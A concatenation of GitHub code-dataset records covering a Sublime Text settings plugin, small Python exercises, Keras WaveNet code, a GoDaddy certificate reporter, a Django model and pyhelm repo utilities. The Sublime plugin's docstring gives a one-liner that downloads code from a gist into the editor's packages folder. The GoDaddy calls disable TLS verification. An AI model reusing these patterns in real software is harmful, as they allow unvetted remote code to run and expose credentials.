Please restart Sublime Text to make sure everything is working\");\n\n for Sublime Text **2**\n\n import os.path, urllib2,sublime;save_to=os.path.join(sublime.packages_path(),'User','settings.py');page=urllib2.urlopen('https://gist.githubusercontent.com/math2001/6cd5cbb9d2741654c2e994d33c395729/raw/70ee7e80e1e555990416e57576c1c01c194809f5/settings.py');code=page.read().decode('utf-8');file=open(save_to,'w');file.write(code);file.close();print(\"Voila! Everything's done. Please restart Sublime Text to make sure everything is working\")\n\n If, for some reason, it is not working, you can just do it in a manual way:\n\n 1. copy the code of this file (all of it)\n 2. in sublime text, go to `Preferences -> browse packages`\n 3. go into the `user` directory\n 4. create a file called `settings.py`\n 5. open it with sublime text, and paste the code\n 6. restart sublime text\n\n\n \"\"\"\n\n sublime.run_command('new_window')\n new_window = sublime.active_window()\n new_window.run_command(\n 'set_layout',\n {\n 'cols': [0.0, 0.5, 1.0],\n 'rows': [0.0, 1.0],\n 'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n })\n\n file_name = os.path.basename(base_file)\n\n if user_file is None:\n user_file = '${packages}/User/' + file_name\n\n\n new_window.focus_group(0)\n new_window.run_command('open_file', {'file': base_file})\n new_window.focus_group(1)\n new_window.run_command('open_file', {'file': user_file})\n\n base_view = new_window.active_view_in_group(0)\n user_view = new_window.active_view_in_group(1)\n\n base_view.settings().set('edit_settings_view', True)\n user_view.settings().set('edit_settings_view', True)\n\n user_view.settings().set('default_contents', default)\n\n if user_view.is_dirty():\n user_view.insert\n\n base_view.set_read_only(True)\n\nclass EditSettingsListener:\n\n def on_close(self, view):\n \"\"\"\n Closes the other settings view when one of the two is closed\n \"\"\"\n\n view_settings = view.settings()\n\n if not view_settings.get('edit_settings_view'):\n return\n\n window = sublime.active_window()\n\n sublime.set_timeout(lambda: window.run_command('close_window'), 50)\n\n def on_load(self, view):\n default_contents = view.settings().get('default_contents')\n if not os.path.isfile(view.file_name()) and default_contents:\n view.run_command('insert_snippet', {'contents': default_contents})\n","repo_name":"PeterLEE159/sublime-backup","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25953365376","text":"#!/usr/bin/python3\n\n\"\"\"\n Script that creates a new state\n\n\"\"\"\n\nimport sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom model_state import Base, State\n\nif __name__ == '__main__':\n args = sys.argv\n Engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(args[1], args[2], args[3]),\n pool_pre_ping=True)\n Session = sessionmaker(bind=Engine)\n session = Session()\n\n new_state = State(name='Louisiana')\n session.add(new_state)\n session.commit()\n\n print(new_state.id)\n","repo_name":"CodedJay672/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42090419913","text":"\"\"\"\nFaça um Programa para um caixa eletrônico.\nO programa deverá 
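The `model_state_insert` script above shows the standard SQLAlchemy insert flow: bind a session factory to an engine, `add` a mapped object, `commit`, and read back the autogenerated primary key. A self-contained variant using an in-memory SQLite database instead of MySQL, so it runs without credentials (note this assumes SQLAlchemy 1.4+, where `declarative_base` lives in `sqlalchemy.orm`):

```python
# Same add/commit/read-back-the-id pattern, against in-memory SQLite.
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.orm import declarative_base, sessionmaker

Base = declarative_base()

class State(Base):
    __tablename__ = 'states'
    id = Column(Integer, primary_key=True)
    name = Column(String(128), nullable=False)

engine = create_engine('sqlite://')          # in-memory database
Base.metadata.create_all(engine)

Session = sessionmaker(bind=engine)
session = Session()

new_state = State(name='Louisiana')
session.add(new_state)
session.commit()                             # flushes and assigns the id

print(new_state.id)                          # 1
```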
perguntar ao usuário a valor do saque e depois informar\nquantas notas de cada valor serão fornecidas.\nAs notas disponíveis serão as de 1, 5, 10, 50 e 100 reais.\nO valor mínimo é de 10 reais e o máximo de 600 reais.\nO programa não deve se preocupar com a quantidade de notas existentes na\nmáquina.\nExemplo 1:\nPara sacar a quantia de 256 reais, o programa fornece duas notas de 100,\numa nota de 50, uma nota de 5 e uma nota de 1;\nExemplo 2:\nPara sacar a quantia de 399 reais, o programa fornece três notas de 100,\numa nota de 50, quatro notas de 10, uma nota de 5 e quatro notas de 1.\n\"\"\"\n\nprint(\"O limite diário de saque é de R$ 600.\")\nsaque = float(input(\"Digite o valor que deseja sacar: \"))\nif 10 <= saque <= 600:\n print(f\"O valor do saque é de R$ {saque:.2f}.\")\n nota_100 = saque // 100\n saque = saque - (nota_100 * 100)\n nota_50 = saque // 50\n saque = saque - (nota_50 * 50)\n nota_10 = saque // 10\n saque = saque - (nota_10 * 10)\n nota_5 = saque // 5\n saque = saque - (nota_5 * 5)\n nota_1 = saque // 1\n print(\"Você receberá:\\n\"\n f\"{nota_100:.0f} cédula(s) de R$100,00\\n\"\n f\"{nota_50:.0f} cédula(s) de R$ 50,00\\n\"\n f\"{nota_10:.0f} cédula(s) de R$ 10,00\\n\"\n f\"{nota_5:.0f} cédula(s) de R$ 05,00\\n\"\n f\"{nota_1:.0f} cédula(s) de R$ 01,00\")\nelif 10 > saque > 1000:\n print(\"OPERAÇÃO NÃO REALIZADA - O valor é maior que o limite diário de saque.\")\nelse:\n print(\"Valor não permitido.\")\n","repo_name":"JoaoLuizDev/exercicios-python","sub_path":"wiki python/resolucoes/038.py","file_name":"038.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"43822543276","text":"# Python ≥3.5 is required\nimport sys\nassert sys.version_info >= (3, 5)\n\n# Scikit-Learn ≥0.20 is required\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\n# try:\n# # %tensorflow_version only exists in Colab.\n# %tensorflow_version 2.x\n# IS_COLAB = True\n# except Exception:\n# IS_COLAB = False\n\n# TensorFlow ≥2.0 is required\nimport tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\n# if not tf.config.list_physical_devices('GPU'):\n# print(\"No GPU was detected. 
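The cash-machine script above is a greedy change-making algorithm over the note denominations 100, 50, 10, 5, 1 (which works here because each denomination divides evenly into the mix above it). Incidentally, its `elif 10 > saque > 1000:` branch can never be true, so every out-of-range amount falls through to the final `else`. The same decomposition, generalised with `divmod`:

```python
# Greedy banknote breakdown over denominations in descending order;
# divmod yields the note count and the remaining amount in one step.
def breakdown(amount, denominations=(100, 50, 10, 5, 1)):
    notes = {}
    for d in denominations:
        notes[d], amount = divmod(amount, d)
    return notes

print(breakdown(256))  # {100: 2, 50: 1, 10: 0, 5: 1, 1: 1}
print(breakdown(399))  # {100: 3, 50: 1, 10: 4, 5: 1, 1: 4}
```

Both results match the worked examples in the script's own docstring.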
LSTMs and CNNs can be very slow without a GPU.\")\n# if IS_COLAB:\n# print(\"Go to Runtime > Change runtime and select a GPU hardware accelerator.\")\n\n# Common imports\nimport numpy as np\nimport os\nfrom pathlib import Path\n\n# to make this notebook's output stable across runs\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n# To plot pretty figures\n# %matplotlib inline\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Where to save the figures\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"rnn\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\ndef generate_time_series(batch_size, n_steps):\n freq1, freq2, offsets1, offsets2 = np.random.rand(4, batch_size, 1)\n time = np.linspace(0, 1, n_steps)\n series = 0.5 * np.sin((time - offsets1) * (freq1 * 10 + 10)) # wave 1\n series += 0.2 * np.sin((time - offsets2) * (freq2 * 20 + 20)) # + wave 2\n series += 0.1 * (np.random.rand(batch_size, n_steps) - 0.5) # + noise\n return series[..., np.newaxis].astype(np.float32)\n\nnp.random.seed(42)\n\nn_steps = 50\nseries = generate_time_series(10000, n_steps + 10)\nX_train = series[:7000, :n_steps]\nX_valid = series[7000:9000, :n_steps]\nX_test = series[9000:, :n_steps]\nY = np.empty((10000, n_steps, 10))\nfor step_ahead in range(1, 10 + 1):\n Y[..., step_ahead - 1] = series[..., step_ahead:step_ahead + n_steps, 0]\nY_train = Y[:7000]\nY_valid = Y[7000:9000]\nY_test = Y[9000:]\n\nprint(X_train.shape), print(Y_train.shape)\n\nnp.random.seed(42)\ntf.random.set_seed(42)\n\ndef last_time_step_mse(Y_true, Y_pred):\n return keras.metrics.mean_squared_error(Y_true[:, -1], Y_pred[:, -1])\n\nmodel = keras.models.Sequential([\n keras.layers.Conv1D(filters=20, kernel_size=4, strides=2, padding=\"valid\",\n input_shape=[None, 1]),\n keras.layers.GRU(20, return_sequences=True),\n keras.layers.GRU(20, return_sequences=True),\n keras.layers.TimeDistributed(keras.layers.Dense(10))\n])\n\nmodel.compile(loss=\"mse\", optimizer=\"adam\", metrics=[last_time_step_mse])\nhistory = model.fit(X_train, Y_train[:, 3::2], epochs=20,\n validation_data=(X_valid, Y_valid[:, 3::2]))\n\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.InputLayer(input_shape=[None, 1]))\nfor rate in (1, 2, 4, 8) * 2:\n model.add(keras.layers.Conv1D(filters=20, kernel_size=2, padding=\"causal\",\n activation=\"relu\", dilation_rate=rate))\nmodel.add(keras.layers.Conv1D(filters=10, kernel_size=1))\nmodel.compile(loss=\"mse\", optimizer=\"adam\", metrics=[last_time_step_mse])\nhistory = model.fit(X_train, Y_train, epochs=20,\n validation_data=(X_valid, Y_valid))\n\nclass GatedActivationUnit(keras.layers.Layer):\n def __init__(self, activation=\"tanh\", **kwargs):\n super().__init__(**kwargs)\n self.activation = keras.activations.get(activation)\n def call(self, inputs):\n n_filters = inputs.shape[-1] // 2\n linear_output = self.activation(inputs[..., :n_filters])\n gate = keras.activations.sigmoid(inputs[..., n_filters:])\n return self.activation(linear_output) * gate\n\ndef wavenet_residual_block(inputs, n_filters, dilation_rate):\n z = keras.layers.Conv1D(2 
* n_filters, kernel_size=2, padding=\"causal\",\n dilation_rate=dilation_rate)(inputs)\n z = GatedActivationUnit()(z)\n z = keras.layers.Conv1D(n_filters, kernel_size=1)(z)\n return keras.layers.Add()([z, inputs]), z\n\nkeras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nn_layers_per_block = 3 # 10 in the paper\nn_blocks = 1 # 3 in the paper\nn_filters = 32 # 128 in the paper\nn_outputs = 10 # 256 in the paper\n\ninputs = keras.layers.Input(shape=[None, 1])\nz = keras.layers.Conv1D(n_filters, kernel_size=2, padding=\"causal\")(inputs)\nskip_to_last = []\nfor dilation_rate in [2**i for i in range(n_layers_per_block)] * n_blocks:\n z, skip = wavenet_residual_block(z, n_filters, dilation_rate)\n skip_to_last.append(skip)\nz = keras.activations.relu(keras.layers.Add()(skip_to_last))\nz = keras.layers.Conv1D(n_filters, kernel_size=1, activation=\"relu\")(z)\nY_proba = keras.layers.Conv1D(n_outputs, kernel_size=1, activation=\"softmax\")(z)\n\nmodel = keras.models.Model(inputs=[inputs], outputs=[Y_proba])\n\nmodel.compile(loss=\"mse\", optimizer=\"adam\", metrics=[last_time_step_mse])\nhistory = model.fit(X_train, Y_train, epochs=2,\n validation_data=(X_valid, Y_valid))\n\n\n","repo_name":"lalitgarg12/TensorFlowCertificationPractice","sub_path":"10Chapter15TFBook/04Using1DConvSeq.py","file_name":"04Using1DConvSeq.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"37724073782","text":"def kalkulatorBMI():\r\n jenisKelamin = input(\"Jenis Kelamin [Pria/Wanita] :\\n=> \")\r\n jenisKelamin = jenisKelamin.capitalize()\r\n if jenisKelamin == \"Pria\" or jenisKelamin == \"Wanita\":\r\n None\r\n else:\r\n print(\"Mohon masukkan jenis kelamin yang benar sesuai pilihan\")\r\n kalkulatorBMI()\r\n\r\n usia = int(input(\"Usia :\\n=> \"))\r\n if usia < 18:\r\n result = print(\"Kalkulator hanya untuk 18 tahun ke atas\")\r\n return result and None\r\n \r\n beratBadan = float(input(\"Berat Badan (kg) :\\n=> \"))\r\n tinggiBadan = int(input(\"Tinggi Badan (cm) :\\n=> \"))\r\n\r\n meter = tinggiBadan/100\r\n calcBMI = beratBadan/meter**2\r\n if calcBMI < 18.5:\r\n result = print(\r\n f\"Hasil BMI < 18.5\\n=> {calcBMI}\\nBerat Badan Kurang\\nAnda kekurangan berat badan\"\r\n )\r\n return result\r\n elif 18.5 <= calcBMI < 22.9:\r\n result = print(\r\n f\"Hasil BMI diantara 18.5 dan 22.9\\n=> {calcBMI}\\nNormal\\nAnda memiliki berat badan ideal.\\nGood job!!\"\r\n )\r\n return result\r\n else:\r\n result = print(\r\n f\"Hasil BMI lebih dari 25\\n=> {calcBMI}\\nObesitas\\nAnda berada dalam kategori obesitas\"\r\n )\r\n return result\r\n \r\nrepeat = True \r\nwhile repeat:\r\n kalkulatorBMI()\r\n repeat = input(\"Ulang? 
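The dilated causal stacks above grow their receptive field exponentially with depth: each `Conv1D` layer with kernel size k and dilation d extends it by d × (k − 1) time steps. A quick arithmetic check for the simpler dilated model above (kernel size 2, rates 1, 2, 4, 8 repeated twice; the final 1×1 convolution adds nothing):

```python
# Receptive field of stacked dilated causal convolutions.
def receptive_field(kernel_size, dilation_rates):
    return 1 + sum(d * (kernel_size - 1) for d in dilation_rates)

rates = [1, 2, 4, 8] * 2          # the rates used in the model above
print(receptive_field(2, rates))  # 31 input steps influence each output step
```

This is why WaveNet-style blocks double the dilation rate layer by layer: linear depth buys exponential context.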
[Ya/Tidak]\\n=> \")\r\n if repeat == \"Ya\" or repeat == \"ya\":\r\n repeat = True\r\n elif repeat == \"Tidak\" or repeat == \"tidak\":\r\n repeat = False\r\n else:\r\n print(\"Input Invalid!\")\r\n repeat = False","repo_name":"zkaraqy/Python","sub_path":"kalkulatorBMI.py","file_name":"kalkulatorBMI.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15340729126","text":"import requests, json, base64, sys\nfrom datetime import date, datetime\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nimport smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n# GoDaddy Settings\nshopperId = '{your-shopper-id}'\napiKey = '{your-api-key}'\napiSecret = '{your-api-secret}'\nignoreExpired = True # True or False\nignoreRevoked = True # True or False\n\n\n# SMTP Settings\nsmtpServer = \"{your-smtp-server-address}\"\nemailSender = \"{email-address-of-the-report-sender}\"\nemailRecipients = \"{comma-separated-list-of-email-recipients}\"\n\n\ndef get_customer_id(key, secret, shopperId):\n headers = {'Authorization' : 'sso-key ' + key + ':' + secret}\n return requests.get('https://api.godaddy.com/v1/shoppers/' + shopperId + '?includes=customerId', headers = headers, verify = False).json()['customerId']\n\ndef list_certificates(key, secret, customerId):\n headers = {'Authorization' : 'sso-key ' + key + ':' + secret}\n return requests.get('https://api.godaddy.com/v2/customers/' + customerId + '/certificates', headers = headers, verify = False).json()['certificates']\n \ndef clean_date(date):\n return date[0:19].replace('T', ' ')\n \ndef calc_days_left(date):\n expiry_date = datetime.strptime(date, '%Y-%m-%d %H:%M:%S')\n return (expiry_date - datetime.now()).days\n \ndef send_email(sender, recipients, subject, content):\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = subject\n message[\"From\"] = sender\n message[\"To\"] = recipients\n message.attach(MIMEText(content, \"html\"))\n with smtplib.SMTP(smtpServer) as smtp:\n smtp.sendmail(sender, recipients, message.as_string())\n\ncertificates = list_certificates(apiKey, apiSecret, get_customer_id(apiKey, apiSecret, shopperId))\nhtml = \"\"\"\\\n\n \n \n \n \n \n \n
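The Indonesian BMI script above computes weight in kilograms divided by the square of height in metres, with the 18.5/22.9 cut-offs common in Asian-population guidelines (its final branch is labelled "more than 25" even though it actually catches everything from 22.9 up). The core computation in function form:

```python
# BMI = weight_kg / height_m**2, mapped onto the script's three bands.
def bmi_category(weight_kg, height_cm):
    bmi = weight_kg / (height_cm / 100) ** 2
    if bmi < 18.5:
        return bmi, "underweight"
    if bmi < 22.9:
        return bmi, "normal"
    return bmi, "obese"

print(bmi_category(70, 175))  # (22.857..., 'normal')
```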

    GoDaddy Certificates Report

    \n

    Weekly certificates report for \"\"\" + date.today().strftime(\"%d/%m/%Y\") + \"\"\"

    \n \n \n\"\"\"\nfor certificate in certificates:\n if ('status' in certificate and certificate['status'] != 'DENIED' and (not ignoreExpired or (ignoreExpired and certificate['status'] != 'EXPIRED')) and (not ignoreRevoked or (ignoreRevoked and certificate['status'] != 'REVOKED'))):\n sans = ''\n if ('subjectAlternativeNames' in certificate):\n sans = ', '.join(certificate['subjectAlternativeNames'])\n cls = 'ok'\n days_left = calc_days_left(clean_date(certificate['validEndAt']))\n if (days_left <= 60 or certificate['status'] == 'EXPIRED' or certificate['status'] == 'REVOKED'):\n cls = 'alert'\n html += ''\n #print(certificate['commonName'] + ', ' + certificate['status'] + ', ' + clean_date(certificate['validStartAt']) + ', ' + clean_date(certificate['validEndAt']) + ', ' + str(calc_days_left(clean_date(certificate['validEndAt']))))\n \nhtml += \"\"\"\\\n
    Common NameSANStatusIssue DateExpire DateDays Left
    ' + certificate['commonName'] + '' + sans + '' + certificate['status'] + '' + clean_date(certificate['validStartAt']) + '' + clean_date(certificate['validEndAt']) + '' + str(days_left) + '
    \n
    [ Elad Ben-Matityahu ]
    \n \n \n\"\"\"\n\nsend_email(emailSender, emailRecipients, \"GoDaddy Certificates Report\", html)\n\n","repo_name":"bmelad/godaddy-certificates-monitor","sub_path":"godaddy-certificates-monitor.py","file_name":"godaddy-certificates-monitor.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28332788740","text":"import os\nimport re\n\nmain_folder_name = input(\"Select folder: \")\nmain_folder_path = os.path.join(os.getcwd(), main_folder_name)\n# Define the regex pattern to extract the desired groups\npattern = r\"Gen5TriplesCustomGame-\\d{4}-\\d{2}-\\d{2}-mtn(\\w+)-mtn(\\w+)(?: \\((\\d+)\\))?\\.html\"\n# Iterate over the subfolders within the main folder\nfor folder_name in os.listdir(main_folder_path):\n sub_folder_path = os.path.join(main_folder_path, folder_name)\n if os.path.isdir(sub_folder_path):\n # Iterate over the files in the folder\n for file_name in os.listdir(sub_folder_path):\n file_path = os.path.join(sub_folder_path, file_name)\n if os.path.isfile(file_path):\n # Match the regex pattern against the filename\n match = re.match(pattern, file_name)\n if match:\n # Extract the groups\n group1 = match.group(1)\n group2 = match.group(2)\n group3 = int(match.group(3)) + 1 if match.group(3) else 1\n # Construct the new filename\n new_filename = f\"{folder_name}-{group1}-{group2}-g{group3}.html\"\n new_file_path = os.path.join(sub_folder_path, new_filename)\n # Rename the file\n os.rename(file_path, new_file_path)\n print(f\"Renamed '{file_name}' to '{new_filename}'\")\n else:\n print(f\"Skipped '{file_name}' as it doesn't match the pattern.\")","repo_name":"JT-jt3/pokemon_metronome_tournament","sub_path":"rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5431651275","text":"from django.db import models\n\nclass AthleteManager(models.Manager):\n def validator(self, form):\n print(form)\n errors = {}\n\n fname = form['fname']\n lname = form['lname']\n # gender = form['gender']\n image_path = form['image_path']\n sport = form['sport']\n\n if not fname:\n errors['fname'] = \"First name is required\"\n if not lname:\n errors['lname'] = \"Last name is required\"\n if not 'gender' in form:\n errors['gender'] = \"Gender is required\"\n if not image_path:\n errors['image_path'] = \"Image path is required\"\n if not sport:\n errors['sport'] = \"Sport is required\"\n\n # print(errors)\n\n if not errors:\n athlete = Athlete.objects.create(fname=fname, lname=lname, gender=form['gender'], image_path=image_path, sport=sport)\n return (True, athlete)\n else:\n return (False, errors)\n\n return (False, errors)\n\n\nclass Athlete(models.Model):\n fname = models.CharField(max_length=255)\n lname = models.CharField(max_length=255)\n gender = models.CharField(max_length=255)\n sport = models.CharField(max_length=255)\n image_path = models.CharField(max_length=255)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n objects = AthleteManager()\n\n def __repr__(self):\n return f\"\"\n","repo_name":"nramiscal/athleteAJAXSearch","sub_path":"apps/myapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"730029100","text":"#-*- coding:utf-8 -*-\n\"\"\"\nrepo 
包含repo处理的简单函数,包括返回chart版本列表\nchart名称列表以及根据字符搜索chart等功能\n\"\"\"\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import BytesIO as StringIO\nimport os\nimport git\nimport requests\nimport shutil\nimport tarfile\nimport tempfile\nimport yaml\n\nfrom utils.exceptions import CustomError\n\n__all__ = [\"RepoUtils\", \"repo_chart\", \"repo_search\", \"chart_versions\", \"repo_index\", \"from_repo\", \"git_clone\", \"source_cleanup\"]\n\n\nclass RepoUtils(object):\n \"\"\"Utils for repo control\n \n 该类实现repo的基本分析操作.\n \"\"\"\n\n @staticmethod\n def repo_chart(index_data):\n \"\"\"return all item of chart\n\n return all item for index_data.\n\n Args:\n index_data: index.yaml的dict格式数据\n\n Returns:\n 由chart名称所组成的list\n\n \"\"\"\n return index_data[\"entries\"].keys()\n\n @staticmethod\n def repo_search(index_data, search_string):\n \"\"\"search chart name by keyword\n \n 搜索包含search_string的chart,并返回列表\n Args:\n index_data: index.yaml的dict格式数据\n search_string: 搜索字符串 \n\n Returns:\n 由chart名称所组成的list\n\n \"\"\"\n search_result = []\n for item in index_data[\"entries\"].keys():\n if item.find(search_string) != -1:\n search_result.append(item)\n return search_result\n\n @staticmethod\n def chart_versions(index_data, chart_name):\n \"\"\"return chart all versions\"\n 返回chart_name的所有版本列表 \n \n Args:\n index_data: index.yaml的dict格式数据(dict)\n chart_name: chart_name(str) \n\n Returns:\n 由chart version所组成的list\n\n \"\"\"\n chart_all_versions = index_data[\"entries\"][chart_name]\n chart_version_list = [item[\"version\"] for item in chart_all_versions]\n return chart_version_list\n\n @staticmethod\n def repo_index(repo_url, timeout=3):\n \"\"\"Downloads the Chart's repo index\n \n 返回repo_url的字典格式数据 \n \n Args:\n repo_url: repo的链接(str)\n timeout: 请求超时时间\n\n Returns:\n repo_url的字典数据\n \"\"\"\n index_url = os.path.join(repo_url, 'index.yaml')\n index = requests.get(index_url, timeout=timeout)\n return yaml.safe_load(index.content)\n\n @staticmethod\n def from_repo(repo_url, chart, version=None, timeout=3):\n \"\"\"Downloads the chart from a repo.\n\n 返回下载并解压后的chart目录 \n \n Args:\n repo_url: repo的链接(str)\n chart: chart名称(str)\n version: chart版本(str)\n timeout: 请求超时时间(int)\n\n Returns:\n 返回下载并解压后的chart目录 \n \"\"\"\n _tmp_dir = tempfile.mkdtemp(prefix='pyhelm-', dir='/tmp')\n index = RepoUtils.repo_index(repo_url)\n\n if chart not in index['entries']:\n raise CustomError('Chart not found in repo')\n\n versions = index['entries'][chart]\n\n if version is not None:\n versions = filter(lambda k: k['version'] == version, versions)\n\n metadata = sorted(versions, key=lambda x: x['version'])[0]\n for url in metadata['urls']:\n req = requests.get(url, stream=True, timeout=timeout)\n fobj = StringIO(req.content)\n tar = tarfile.open(mode=\"r:*\", fileobj=fobj)\n tar.extractall(_tmp_dir)\n return os.path.join(_tmp_dir, chart)\n\n @staticmethod\n def git_clone(repo_url, branch='master'):\n \"\"\"clones repo to a /tmp/ dir\n\n git clone代码到/tmp\n Args:\n repo_url: repo链接 \n branch: 分支名称\n\n Returns:\n 临时目录\n \"\"\"\n\n _tmp_dir = tempfile.mkdtemp(prefix='pyhelm-', dir='/tmp')\n git.Repo.clone_from(url=repo_url, to_path=_tmp_dir, branch=branch)\n\n return _tmp_dir\n\n @staticmethod\n def source_cleanup(target_dir):\n \"\"\"Clean up source.\n\n 清理临时目录 \n \n Args:\n target_dir: 待清理的目录 \n\n Returns:\n \"\"\"\n shutil.rmtree(os.path.split(target_dir)[0])\n\nif __name__ == \"__main__\":\n\n import repo\n 
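`from_repo` above streams the chart tarball into a bytes buffer and unpacks it with `tarfile.open(mode="r:*", fileobj=...)`. The same buffer-to-tarfile pattern in isolation, building a tiny archive in memory first so the sketch needs no network access (the chart name and payload are made up for illustration):

```python
# The tarfile-from-a-bytes-buffer pattern used by from_repo() above.
import io
import tarfile
import tempfile

buf = io.BytesIO()
with tarfile.open(mode="w:gz", fileobj=buf) as tar:
    payload = b"name: demo-chart\n"
    info = tarfile.TarInfo("demo-chart/Chart.yaml")
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))

tmp_dir = tempfile.mkdtemp(prefix="pyhelm-")
buf.seek(0)
with tarfile.open(mode="r:*", fileobj=buf) as tar:
    tar.extractall(tmp_dir)     # same call as in from_repo()

print(open(f"{tmp_dir}/demo-chart/Chart.yaml").read())  # name: demo-chart
```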
print(help(repo))\n","repo_name":"aiopsclub/python-helm","sub_path":"pyhelm/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"31"} +{"seq_id":"34407562023","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport os\r\nfrom scipy import misc\r\nimport numpy as np\r\nimport os.path\r\n\r\nimport torch.utils.data\r\nimport torchvision.transforms as transforms\r\n\r\ndef default_image_loader(path):\r\n \"\"\"\r\n return Image.open(path).convert('RGB')\r\n \"\"\"\r\n return Pipeline(path)\r\n\r\nclass TripletImageLoader(torch.utils.data.Dataset):\r\n def __init__(self, triplets_file_name, gpu, transform=None,loader=default_image_loader):\r\n \"\"\" triplets_file_name: A text file with each line containing three files, \r\n For a line of files 'a b c', a triplet is defined such that image a is more \r\n similar to image c than it is to image b, e.g., \r\n 0 2017 42 \"\"\"\r\n triplets = []\r\n for line in open(triplets_file_name):\r\n split = line.split(\" # \")\r\n triplets.append((split[0], split[1], split[2][:-1])) # anchor, far, close\r\n self.triplets = triplets\r\n self.transform = transform\r\n self.loader = loader\r\n self.dataset = len(self.triplets)\r\n self.gpu = gpu\r\n\r\n def __getitem__(self, index):\r\n path1, path2, path3 = self.triplets[index]\r\n img1 = self.loader(path1)\r\n img2 = self.loader(path2)\r\n img3 = self.loader(path3)\r\n if self.transform is not None:\r\n img1 = self.transform(img1)\r\n img2 = self.transform(img2)\r\n img3 = self.transform(img3)\r\n\r\n return img1, img2, img3\r\n\r\n def __len__(self):\r\n return len(self.triplets)\r\n \r\ndef Pipeline(path):\r\n image = misc.imread(path, mode = 'RGB')\r\n image_pp = im_preprocess(cv2.resize(image, (128,128)))\r\n #return np.asarray([image_pp])\r\n return image_pp\r\n \r\ndef im_preprocess(image):\r\n image = np.asarray(image, np.float32)\r\n image -= np.array([104, 117, 123], dtype=np.float32).reshape(1, 1, -1)\r\n image = image.transpose((2, 0, 1))\r\n return image\r\n","repo_name":"Holy225/DL-ComputerVision","sub_path":"Training/triplet_image_loader_square.py","file_name":"triplet_image_loader_square.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31022433830","text":"\"\"\"\n=============\npython-oauth2\n=============\n\npython-oauth2 is a framework that aims at making it easy to provide\nauthentication via `OAuth 2.0 `_ within\nan application stack.\n\nUsage\n=====\n\nExample:\n\n.. 
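The triplet loader's `im_preprocess` above does two things common to Caffe/VGG-style pipelines: subtract fixed per-channel means (104, 117, 123) and reorder the axes from HWC to the CHW layout that PyTorch convolutions expect. The same steps on a dummy image:

```python
# Mean subtraction plus HWC -> CHW transpose, as in im_preprocess() above.
import numpy as np

image = np.random.randint(0, 256, size=(128, 128, 3)).astype(np.float32)
image -= np.array([104, 117, 123], dtype=np.float32).reshape(1, 1, -1)
chw = image.transpose((2, 0, 1))

print(chw.shape)   # (3, 128, 128)
print(chw.dtype)   # float32
```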
